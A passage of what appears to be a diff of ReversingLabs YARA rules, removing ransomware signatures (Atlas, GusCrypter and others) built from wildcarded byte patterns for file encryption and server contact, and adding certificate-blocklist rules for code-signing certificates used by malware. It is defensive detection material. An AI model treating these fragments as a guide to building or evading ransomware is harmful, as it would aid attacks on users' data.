?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? - ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? - ?? ?? C9 C3 - } - $extract_rsrc_v1 = { - 55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1 - E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ?? - ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 - 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A - ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 - ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? - C9 C3 - } - $search_and_encrypt_v2_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F - 84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C - ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 - ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 - } - $search_and_encrypt_v2_p2 = { - E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? - FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A - ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F - 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? - ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? - ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 - D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF - 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? - ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3 - } - $extract_rsrc_v2 = { - 55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 - 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8 - ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? - ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83 - E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 - FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? - ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A - ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 - FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 - ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 - 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 - ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3 - } - condition: - uint16(0)==0x5A4D and (($extract_rsrc_v1) and ( all of ($search_and_encrypt_v1_p*))) or (($extract_rsrc_v2) and ( all of ($search_and_encrypt_v2_p*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RADIANT, OOO" and pe.signatures[i].serial=="6e:2d:34:49:27:2b:6b:96:b8:b9:f7:28:e8:75:80:d5" and 1421107200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_268C0D7028A154Ac3B6349C5 : INFO FILE { meta: - description = "Yara rule that detects Atlas ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2c702b24-4b7e-505c-a694-0d915cc47315" - date = "2020-07-15" - modified = "2020-07-15" + id = "0e18d9ef-e861-5583-a2a3-5f54fae8d813" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12948-L12964" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8311b36f008e31b7ac27b439fa46da4c90ab4be6c7c89426f8e1939963bc3d7d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Atlas" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ?? - ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ?? - ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF - D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A - 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 - ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8 - ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8 - ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ?? - ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B - 7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ?? - 8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24 - ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ?? - ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3 - } - $remote_server_1 = { - 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E - 8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? - ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51 - 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ?? - ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ?? - ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ?? - 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? - 33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ?? - ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ?? - 83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB - } - $remote_server_2 = { - 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4 - ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ?? - ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB - ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? - ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B - D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? - ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ?? - ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B - C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0 - 83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C - 34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ?? - ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ?? - 83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? - 8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C - 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 - } - $send_post_packet = { - 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83 - FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B - 8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ?? - ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? - 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ?? - 33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? - 56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $send_get_request = { - 68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 - FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33 - C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66 - 89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83 - F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33 - C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ?? - ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? - 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="26:8c:0d:70:28:a1:54:ac:3b:63:49:c5" and 1474266712<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Guscrypter : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_2Daa8D629Cc0410A9482E62A0F8Bf8Fc : INFO FILE { meta: - description = "Yara rule that detects GusCrypter ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64aa468c-ec24-58aa-8ea9-23f0cebed227" - date = "2020-11-26" - modified = "2020-11-26" + id = "71e627d9-0892-5501-8189-26eae36b7965" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.GusCrypter.yara#L1-L129" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cfe6005028c0e5f5d713af2a549574203678bab2ee48acc1727702bcf91522b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12966-L12982" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cfb2631bc1832f65fb9d77c812bf2a1e05121e825254bd57ae8b21e7b10b2344" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "GusCrypter" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? - ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F - 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F - 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A - ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ?? - 66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F - 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 - EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8 - ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ?? - 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D - ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 - ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D - ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? - ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 - } - $find_files_p2 = { - 81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 - F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? - 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? - 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? - 0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? - 83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? - 83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? - ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D - ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF - ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75 - ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? - ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 - C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? - 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? - ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ?? - 72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF - 15 - } - $encrypt_files_p1 = { - 88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ?? - 99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ?? - ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ?? - ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 - E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ?? - 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA 